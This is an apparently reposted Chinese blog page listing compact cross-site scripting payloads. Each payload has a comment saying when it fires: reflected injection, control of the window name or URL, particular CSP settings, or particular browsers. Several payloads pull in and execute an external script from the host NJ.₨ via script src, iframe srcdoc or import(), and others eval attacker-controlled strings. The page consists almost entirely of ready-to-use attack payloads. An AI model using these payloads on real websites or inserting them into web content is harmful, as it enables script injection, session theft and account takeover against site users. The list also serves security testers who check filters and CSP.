XSS-Payloads集合

简介: XSS-Payloads集合

XSS-Payloads

<!-- 仅适用于反射型XSS --!>
<svg/onload=eval(name)>
<!-- 如果你控制了 URL --> 
<svg/onload=eval(`'`+URL)>
<!-- 如果你控制了名字,但是 unsafe-eval 没有启用 --> 
<svg/onload=location=name>
<!-- 在 chrome 中,也适用于 innerHTML,即使在尚未插入 DOM 的元素上 --> 
<svg><svg/onload=eval(name)>
<!-- 如果您控制窗口的名称,此有效负载将在innerHTML 内工作,即使在尚未插入DOM 的元素上--> 
<audio/src/onerror=eval(name)>
<!-- 如果您控制 URL,此有效负载将在 innerHTML 内工作,即使在尚未插入 DOM 的元素上 --> 
<img/src/onerror=eval(`'`+URL)>
<!-- 随便一个脚本 --> 
<script/src=//NJ.₨></script>
<!-- 如果你控制了窗口的名字 --> 
<iframe/onload=src=top.name>
<!-- 如果你控制了 URL --> 
<iframe/onload=eval(`'`+URL)>
<!-- 如果页面上的 iframe 数量不变 --> 
<iframe/onload=src=top[0].name+/\NJ.₨?/>
<!-- 仅适用于 Firefox --> 
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<!-- 如果页面上的 iframe 数量是随机的 --> 
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>
<!-- 如果在 CSP 中禁用 unsafe-inline 并且允许外部脚本 --> 
<iframe/srcdoc="<script/src=//NJ.₨></script>">
<!-- 如果允许内联样式 --> 
<style/onload=eval(name)>
<!-- 如果允许内联样式并且可以控制 URL --> 
<style/onload=eval(`'`+URL)>
<!-- 如果内联样式被阻止 --> 
<style/onerror=eval(name)>
<!-- 使用外部脚本作为导入,在innerHTML 中不起作用,除非Firefox -->
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 --> 
<svg/onload=import(/\\NJ.₨/)>
<!-- 使用外部脚本作为导入,如果允许内联样式则触发。
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<style/onload=import(/\\NJ.₨/)>
<!-- 使用外部脚本作为导入 --> 
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 --> 
<iframe/onload=import(/\\NJ.₨/)>

弃用

<!-- 如果你控制了网址,Safari-only -->
<iframe/onload=write(URL)>
<!-- 如果允许内联样式,仅 Safari --> 
<style/onload=write(URL)>

image.png

image.png

参考链接

https://github.com/terjanq/Tiny-XSS-Payloads#current-payloads


相关文章
|
6月前
|
JavaScript 前端开发
解释 JavaScript 中的`map()`、`filter()`和`reduce()`方法的用途。
解释 JavaScript 中的`map()`、`filter()`和`reduce()`方法的用途。
64 1
|
15天前
|
存储 监控 安全
|
1月前
|
JavaScript 前端开发 安全
|
1月前
|
存储 Web App开发 安全
XSS漏洞原理(三)存储型
XSS漏洞原理(三)存储型
|
6月前
|
存储 安全 JavaScript
XSS攻击是什么?它有哪些类型?
防御XSS攻击的方法包括输入验证和过滤、输出编码、使用CSP(Content Security Policy)、避免直接操作DOM等。开发人员应当谨慎处理用户输入,不信任的输入应该被过滤或编码,以确保不会被当做脚本执行。此外,定期进行安全审计和漏洞扫描也是防御XSS攻击的重要步骤。
112 0
|
6月前
|
JSON 安全 Go
30、xss发生的位置
30、xss发生的位置
64 1
|
6月前
|
存储 前端开发 JavaScript
存储型 XSS 攻击演示(附链接)
存储型 XSS 攻击演示(附链接)
|
JavaScript 前端开发
javascript实现对象数据键值不同的Object.keys循环读取解决方案
javascript实现对象数据键值不同的Object.keys循环读取解决方案
84 0
javascript实现对象数据键值不同的Object.keys循环读取解决方案
|
Web App开发 JavaScript 前端开发
详探XSS PayIoad
1.Cookie劫持 一个最常见的XSS Payload,就是通过读取浏览器的Cookie对象,从而发起“Cookie劫持”攻击 Cookie中一般加密保存了当前用户的登录凭证。Cookie如果丢失,往往意味着用户的登录凭证丢失。换句话说,攻击者可以不通过密码,而直接登录进用户的账户
182 1
详探XSS PayIoad
|
SQL 前端开发 JavaScript
防止XSS跨站脚本攻击:Java过滤器
防止XSS跨站脚本攻击:Java过滤器
1853 1
防止XSS跨站脚本攻击:Java过滤器